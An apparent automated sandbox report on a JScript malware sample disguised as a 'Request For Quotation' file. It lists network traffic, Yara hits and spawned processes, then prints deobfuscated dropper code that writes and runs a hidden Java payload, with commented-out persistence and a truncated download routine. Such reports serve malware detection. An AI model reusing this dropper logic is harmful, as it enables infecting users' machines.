Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57932
Source: unknown Network traffic detected: HTTP traffic on port 57660 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57931
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57661
Source: unknown Network traffic detected: HTTP traffic on port 57919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57660
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57611 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57829
Source: unknown Network traffic detected: HTTP traffic on port 57601 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57628 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57667
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57789
Source: unknown Network traffic detected: HTTP traffic on port 57609 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57700
Source: unknown Network traffic detected: HTTP traffic on port 57700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57606 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57711
Source: unknown Network traffic detected: HTTP traffic on port 57620 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57917 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57659 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57607
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57608
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57609
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57603
Source: unknown Network traffic detected: HTTP traffic on port 57924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57605
Source: unknown Network traffic detected: HTTP traffic on port 57603 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57606
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57601
Source: unknown Network traffic detected: HTTP traffic on port 57661 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57602
Source: unknown Network traffic detected: HTTP traffic on port 57918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57612 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57610
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57698
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57611
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57699
Source: unknown Network traffic detected: HTTP traffic on port 57921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57608 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57612
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57613
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57854
Source: unknown Network traffic detected: HTTP traffic on port 57776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57620
Source: unknown Network traffic detected: HTTP traffic on port 57667 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57936 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57908
Source: unknown Network traffic detected: HTTP traffic on port 57605 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57628
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57621
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57622
Source: unknown Network traffic detected: HTTP traffic on port 57922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57750
Source: unknown Network traffic detected: HTTP traffic on port 57621 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 57895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57919
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 57610 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57916
Source: unknown Network traffic detected: HTTP traffic on port 57927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57915
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57918
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57917
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57914
Source: unknown Network traffic detected: HTTP traffic on port 57602 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57913
Source: unknown Network traffic detected: HTTP traffic on port 57938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57613 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57601 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57603 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57602 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57605 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57606 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57607 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57608 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57609 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57610 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57612 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57611 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57613 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57620 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57622 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57621 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57628 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57660 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57661 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57659 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57667 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57698 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57869 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57891 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57890 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57895 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57908 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57913 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57914 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57915 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57917 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57918 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57919 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:57920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57921 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57923 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57922 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:57924 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57925 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57927 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57926 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:57928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57929 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57931 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57930 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:57932 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57933 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57935 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57934 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:57936 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57939 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57938 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.3036224528.0000000009D63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: Process Memory Space: javaw.exe PID: 3300, type: MEMORYSTR Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Detected potential crypto function
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_3_1544D597 1_3_1544D597
Java / VBScript file with very long strings (likely obfuscated code)
Source: Request For Quotation.js Initial sample: Strings found which are bigger than 50
Yara signature match
Source: 00000001.00000002.3036224528.0000000009D63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: Process Memory Space: javaw.exe PID: 3300, type: MEMORYSTR Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: classification engine Classification label: mal100.troj.evad.winJS@6/4@9/4
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\bszhidta.txt Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Request For Quotation.js Virustotal: Detection: 14%
Source: Request For Quotation.js ReversingLabs: Detection: 15%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request For Quotation.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\bszhidta.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\bszhidta.txt" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior

Data Obfuscation
barindex
JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var tempdir = wshShell.ExpandEnvironmentStrings("%temp%");var appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%");var r = Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 10);var stubpath = appdatadir + "\\" + r + ".txt"var decoded = decodeBase64(longText);writeBytes(stubpath, decoded);var fso = WScript.CreateObject("Scripting.FileSystemObject");var text = "";try{text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");}catch(err){}try{if(text == ""){text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");if(text != ""){text = text + "\\bin\\javaw.exe";}}else{text = text + "\\bin\\javaw.exe";}}catch(err){}try{if(text != ""){//wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + text + "\" -jar \"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + text + "\" -jar \"" + stubpath + "\"");} else{GrabJreFromNet();}} catch(err){}function GrabJreFromNet(){do{try{var xHttp = WScript.CreateObject("msxml2.serverxmlhttp.6.0");var bStrm = WScript.CreateObject("Adodb.Stream");xHttp.open("GET", 